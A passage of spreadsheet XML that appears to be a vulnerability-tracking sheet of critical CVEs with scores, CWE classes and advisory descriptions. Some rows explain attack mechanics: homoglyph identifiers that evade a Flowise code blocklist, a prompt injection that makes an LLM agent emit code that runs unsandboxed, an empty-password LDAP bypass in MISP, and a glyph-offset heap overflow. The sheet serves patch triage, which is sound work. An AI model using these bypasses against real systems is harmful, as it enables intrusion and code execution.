          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I348" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L348" s="5" t="inlineStr">
        <is>
          <t>Use after free in Device in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87607</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87609</t>
        </is>
      </c>
      <c r="C349" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D349" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E349" s="5" t="inlineStr"/>
      <c r="F349" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="I349" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr">
        <is>
          <t>Use after free in Sharing in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87609</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87621</t>
        </is>
      </c>
      <c r="C350" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D350" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E350" s="5" t="inlineStr"/>
      <c r="F350" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G350" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H350" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I350" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L350" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87621</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87634</t>
        </is>
      </c>
      <c r="C351" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D351" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E351" s="5" t="inlineStr"/>
      <c r="F351" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I351" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L351" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebPackaging in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87634</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87637</t>
        </is>
      </c>
      <c r="C352" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D352" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E352" s="5" t="inlineStr"/>
      <c r="F352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I352" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L352" s="5" t="inlineStr">
        <is>
          <t>Use after free in Extensions in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87637</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87638</t>
        </is>
      </c>
      <c r="C353" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D353" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E353" s="5" t="inlineStr"/>
      <c r="F353" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I353" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L353" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87638</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87643</t>
        </is>
      </c>
      <c r="C354" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D354" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E354" s="5" t="inlineStr"/>
      <c r="F354" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I354" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L354" s="5" t="inlineStr">
        <is>
          <t>Integer overflow in GPU in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87643</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87646</t>
        </is>
      </c>
      <c r="C355" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D355" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E355" s="5" t="inlineStr"/>
      <c r="F355" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I355" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L355" s="5" t="inlineStr">
        <is>
          <t>Use after free in Web Authentication in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87646</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87650</t>
        </is>
      </c>
      <c r="C356" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D356" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E356" s="5" t="inlineStr"/>
      <c r="F356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I356" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L356" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87650</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87654</t>
        </is>
      </c>
      <c r="C357" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D357" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E357" s="5" t="inlineStr"/>
      <c r="F357" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G357" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H357" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I357" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L357" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87654</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44950</t>
        </is>
      </c>
      <c r="C358" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D358" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E358" s="5" t="inlineStr"/>
      <c r="F358" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L358" s="5" t="inlineStr">
        <is>
          <t>fs_read_glyphs() in the libXfont2 font-server client (src/fc/fserve.c) copies each glyph's bitmap into a single buffer. Existing checks validates only that the source slice (position, length) lies within the source bitmap buffer. It does not check whether the running destination cursor has exceeded the allocation.
A malicious font server can send overlapping source offsets -- for example 1000 glyphs each referencing {position:0, length:64} with nbytes=64. Each individual source range passes the existing validation, but the cumulative writes total 64000 bytes into a 64-byte destination buffer. This is a heap buffer overflow with attacker-controlled content.</t>
        </is>
      </c>
      <c r="M358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44950</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65639</t>
        </is>
      </c>
      <c r="C359" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D359" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E359" s="5" t="inlineStr"/>
      <c r="F359" s="5" t="inlineStr"/>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L359" s="5" t="inlineStr">
        <is>
          <t>OS command injection in the advanced-rule parser of ConfigServer Security &amp; Firewall allows a remote attacker who controls a configured allow/deny feed to execute arbitrary commands as root, due to insufficient validation of feed-supplied rule data.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M359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65639</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66066</t>
        </is>
      </c>
      <c r="C360" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D360" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E360" s="5" t="inlineStr"/>
      <c r="F360" s="5" t="n">
        <v>0.279</v>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="L360" s="5" t="inlineStr">
        <is>
          <t>Action Pack is a framework for handling and responding to web requests. In versions prior to 7.2.3.2, 8.0.5.1 and 8.1.3.1, Active Storage does not disable libvips operations marked unsafe for untrusted content, allowing a crafted upload to invoke such an operation. Consuming applications are affected when configured to use libvips and accept image uploads from untrusted users. An unauthenticated attacker may exploit this behavior to read arbitrary files accessible to the Rails process, including environment variables and application secrets. Exposure of credentials such as secret_key_base or external-service tokens may enable remote code execution or lateral movement. This issue has been fixed in versions 7.2.3.2, 8.0.5.1 and 8.1.3.1.</t>
        </is>
      </c>
      <c r="M360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66066</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70470</t>
        </is>
      </c>
      <c r="C361" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D361" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E361" s="5" t="inlineStr"/>
      <c r="F361" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G361" s="5" t="inlineStr">
        <is>
          <t>java, python</t>
        </is>
      </c>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L361" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise validatePythonCodeForDataFrame in packages/components/src/pythonCodeValidator.ts can be bypassed with Unicode homoglyph identifiers, allowing arbitrary Python execution inside Pyodide and full OS command execution on the Flowise host via Pyodide js module interop. The validator gates pyodide.runPythonAsync in packages/components/nodes/agents/CSVAgent/CSVAgent.ts and packages/components/nodes/agents/AirtableAgent/AirtableAgent.ts with an ASCII word-boundary blacklist. JavaScript regex word boundaries are ASCII-only, while Python 3 NFKC-normalizes identifiers at parse time, so homoglyph forms such as __cl𝐚ss__, __subcl𝐚sses__, __b𝐚se__, and __b𝐮iltins__ bypass the blacklist and are parsed as their ASCII equivalents. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70470</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70477</t>
        </is>
      </c>
      <c r="C362" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D362" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E362" s="5" t="inlineStr"/>
      <c r="F362" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G362" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L362" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, a prompt injection sent to a chatflow using a CSV Agent node can cause the LLM to respond with a malicious Python script that bypasses the blocklist validator and executes in an unsandboxed Pyodide environment. The specific flaw exists within the run method of the CSV_Agents class, where untrusted data is used to construct an LLM prompt and the resulting pythonCode is validated by validatePythonCodeForDataFrame before execution. An attacker can leverage this to execute arbitrary code in the context of the service account. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70477</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85216</t>
        </is>
      </c>
      <c r="C363" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D363" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E363" s="5" t="inlineStr"/>
      <c r="F363" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I363" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>CWE-521</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr">
        <is>
          <t>MISP contains an authentication bypass vulnerability in its LDAP and LinOTP authentication components due to insufficient validation of user-supplied credentials.
The custom LdapAuthenticate and LinOTPAuthenticate components replace CakePHP's FormAuthenticate implementation but did not replicate its credential validation checks. As a result, empty or non-string values could reach the underlying authentication mechanisms.
In the LDAP authentication path, an attacker able to identify a valid directory user's email address could submit an empty password. The empty credential could be passed to ldap_bind(), where an LDAP server accepting unauthenticated binds may return a successful result for a valid distinguished name combined with an empty password. MISP could consequently treat the attacker as the corresponding authenticated directory user without verification of the user's password.
The issue also affected the LinOTP authentication component. Invalid credential types were not rejected before being processed, and when mixed authentication was enabled, an empty password could be checked against a locally stored MISP password hash. LDAP-provisioned MISP accounts could additionally be created with an empty local password because account creation skipped normal validation, resulting in a hash corresponding to an empty password. This could permit authentication through the local fallback mechanism when such an account was no longer resolved through LDAP.
Successful exploitation could allow a remote unauthenticated attacker to impersonate an existing MISP user. If the targeted account has administrative or other privileged permissions, the attacker could gain corresponding access to sensitive threat-intelligence data, modify or delete information, alter configuration, or perform other privileged operations.
The patch resolves the vulnerability by requiring authentication identifiers and passwords to be valid strings, rejecting empty passwords where they are not explicitly permitted, and assigning a randomly generated local password to LDAP-provisioned accounts instead of storing a hash derived from an empty password.</t>
        </is>
      </c>
      <c r="M363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85216</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88062</t>
        </is>
      </c>
      <c r="C364" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D364" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E364" s="5" t="inlineStr"/>
      <c r="F364" s="5" t="inlineStr"/>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="L364" s="5" t="inlineStr">
        <is>
          <t>OmniRoute is an open-source AI gateway providing a single endpoint for multiple model providers. In 3.8.49 and earlier, the OmniRoute POST /api/acp/agents custom ACP agent endpoint accepted attacker-controlled binary and versionCommand values and used only a self-consistency check before execFileSync executed the selected interpreter and arguments. The same request called refreshAgentCache, and resolveVersionProbe accepted the matched command before the execFileSync sink ran it. The tokenizeVersionCommand function and DISALLOWED_VERSION_COMMAND_CHARS filter rejected a limited set of shell metacharacters but still allowed interpreter evaluation arguments. The isAuthenticated function relied on isAuthRequired, which accepted anonymous requests when requireLogin was false, while api/acp/ was absent from LOCAL_ONLY_API_PREFIXES and SPAWN_CAPABLE_PREFIXES. With requireLogin=false or during a fresh-instance bootstrap window, a remote anonymous request could supply an interpreter evaluation argument and execute arbitrary code in the server container. With requireLogin=true and a configured management password, exploitation instead required a management session or management-scoped API key. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88062</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70141</t>
        </is>
      </c>
      <c r="C365" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D365" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E365" s="5" t="inlineStr"/>
      <c r="F365" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr">
        <is>
          <t>oretnom23:customer_support_system</t>
        </is>
      </c>
      <c r="I365" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L365" s="5" t="inlineStr">
        <is>
          <t>SourceCodester Customer Support System 1.0 contains an incorrect access control vulnerability in ajax.php. The AJAX dispatcher does not enforce authentication or authorization before invoking administrative methods in admin_class.php based on the action parameter. An unauthenticated remote attacker can perform sensitive operations such as creating customers and deleting users (including the admin account), as well as modifying or deleting other application records (tickets, departments, comments), resulting in unauthorized data modification.</t>
        </is>
      </c>
      <c r="M365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70141</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11841</t>
        </is>
      </c>
      <c r="C366" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D366" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E366" s="5" t="inlineStr"/>
      <c r="F366" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L366" s="5" t="inlineStr">
        <is>
          <t>An attacker may perform unauthenticated read and write operations on sensitive filesystem areas via the AppEngine Fileaccess over HTTP due to improper access restrictions. A critical filesystem directory was unintentionally exposed through the HTTP-based file access feature, allowing access without authentication. This includes device parameter files, enabling an attacker to read and modify application settings, including customer-defined passwords. Additionally, exposure of the custom application directory may allow execution of arbitrary Lua code within the sandboxed AppEngine environment.</t>
        </is>
      </c>
      <c r="M366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11841</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16242</t>
        </is>
      </c>
      <c r="C367" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D367" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E367" s="5" t="inlineStr"/>
      <c r="F367" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr">
        <is>
          <t>2026-07-20</t>
        </is>
      </c>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L367" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Konnectivity proxy-server configuration for hosted control planes. The agent-facing listener was started without --cluster-ca-cert (and without token-based agent authentication), so client certificates were not validated. A remote attacker who can reach the Konnectivity cluster endpoint could connect as an unauthenticated agent, join the routing pool, and potentially proxy, inspect, modify, or drop control-plane-to-node traffic.</t>
        </is>
      </c>
      <c r="M367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16242</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39975</t>
        </is>
      </c>
      <c r="C368" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D368" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E368" s="5" t="inlineStr"/>
      <c r="F368" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, unauthenticated users could delete the .readonly file on iTop instances, leading to code execution. This file, created during the setup process, prevents users from performing write actions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
